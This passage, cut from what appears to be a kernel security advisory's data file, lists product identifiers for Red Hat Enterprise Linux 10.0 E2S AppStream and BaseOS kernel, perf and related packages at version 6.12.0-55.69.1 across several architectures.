"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
